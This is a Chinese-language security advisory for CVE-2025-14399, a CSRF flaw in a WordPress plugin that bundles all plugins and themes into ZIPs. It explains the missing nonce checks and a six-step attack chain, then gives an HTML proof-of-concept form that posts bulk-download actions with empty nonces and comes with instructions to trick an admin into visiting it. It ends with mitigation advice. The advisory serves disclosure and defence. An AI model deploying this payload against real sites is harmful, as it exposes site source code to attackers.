CVE-2025-14399 WordPress插件CSRF漏洞导致敏感文件打包

漏洞信息

漏洞编号

CVE-2025-14399

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Download Plugins and Themes in ZIP from Dashboard plugin for WordPress

漏洞概述

CVE-2025-14399是WordPress插件"Download Plugins and Themes in ZIP from Dashboard"中的一个跨站请求伪造（CSRF）漏洞。该插件用于从WordPress仪表板下载插件和主题为ZIP压缩包。漏洞存在于所有版本直到1.9.6，由于在download_plugin_bulk和download_theme_bulk函数中缺少或存在错误的nonce验证，导致攻击者可以绕过CSRF保护机制。攻击者可以通过诱导已登录的管理员点击恶意链接或访问特制网页，利用管理员权限执行批量下载操作，将网站上所有安装的插件和主题打包并保存到wp-content/uploads/目录中。这可能导致敏感代码信息泄露，攻击者可获取插件和主题的完整源代码用于进一步分析其他潜在漏洞或进行代码盗用。漏洞利用需要管理员交互（点击链接），但无需认证，攻击者可完全在匿名状态下发起攻击。

技术细节

该漏洞的根本原因在于WordPress插件的CSRF保护机制不完善。在正常情况下，WordPress使用wp_verify_nonce()函数验证请求的合法性，确保请求来自合法的管理员操作。然而，download_plugin_bulk和download_theme_bulk这两个关键函数在处理批量下载请求时，要么未进行nonce验证，要么验证逻辑存在缺陷。攻击者可以构造一个包含恶意参数的POST请求，欺骗已登录的管理员浏览器发送请求到目标WordPress站点。当管理员访问攻击者控制的页面时，页面中的JavaScript会自动提交表单，请求触发插件的批量下载功能。由于请求来自管理员的浏览器，服务器会认为这是合法的管理员操作，从而执行下载并将所有插件和主题打包到wp-content/uploads/目录。攻击者可以通过目录遍历或直接访问该目录获取打包文件。这种攻击方式特别危险，因为攻击者无需窃取凭证，只需诱导用户点击链接即可。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意表单的HTML页面，该表单指向目标WordPress站点的admin-ajax.php接口

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱导已登录的管理员访问恶意页面

STEP 3

步骤3

管理员浏览器自动向目标站点发送POST请求，由于请求来自管理员浏览器且携带有效的会话Cookie，服务器认为这是合法的管理员操作

STEP 4

步骤4

服务器执行download_plugin_bulk或download_theme_bulk函数，将所有插件或主题打包为ZIP文件

STEP 5

步骤5

ZIP文件被保存到wp-content/uploads/目录，攻击者通过目录遍历或猜测文件名访问并下载打包文件

STEP 6

步骤6

攻击者解压获取所有插件和主题的源代码，用于分析其他漏洞或进行代码盗用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-14399 -->
<!-- This PoC demonstrates the CSRF vulnerability in Download Plugins and Themes plugin -->
<!-- Usage: Host this page and trick a logged-in admin to visit it -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-14399 PoC</title>
</head>
<body>
    <h1>CSRF Attack - Plugin/Theme Download</h1>
    <p>Clicking the button below will trigger bulk download of all plugins/themes.</p>
    
    <!-- Auto-submit form for bulk plugin download -->
    <form id="csrfForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="download_plugin_bulk">
        <input type="hidden" name="plugins" value="all">
        <input type="hidden" name="nonce" value=""> <!-- Leave nonce empty to test if validation is missing -->
    </form>
    
    <!-- Auto-submit form for bulk theme download -->
    <form id="csrfFormTheme" action="http://target-site/wp-admin/admin-ajax.php" method="POST" style="display:none;">
        <input type="hidden" name="action" value="download_theme_bulk">
        <input type="hidden" name="themes" value="all">
        <input type="hidden" name="nonce" value="">
    </form>
    
    <button onclick="document.getElementById('csrfForm').submit();">Download All Plugins (CSRF)</button>
    <button onclick="document.getElementById('csrfFormTheme').submit();">Download All Themes (CSRF)</button>
    
    <script>
        // Auto-submit after page loads
        // window.onload = function() { document.getElementById('csrfForm').submit(); };
    </script>
</body>
</html>

影响范围

Download Plugins and Themes in ZIP from Dashboard plugin for WordPress <= 1.9.6

防御指南

临时缓解措施

在官方修复版本发布之前，建议管理员启用WordPress的CSRF保护插件，并在点击来自第三方网站的链接时保持谨慎。不要点击来路不明的链接，尤其是那些要求执行操作或包含可疑内容的链接。同时可以临时禁用该插件的批量下载功能，等待官方发布安全更新。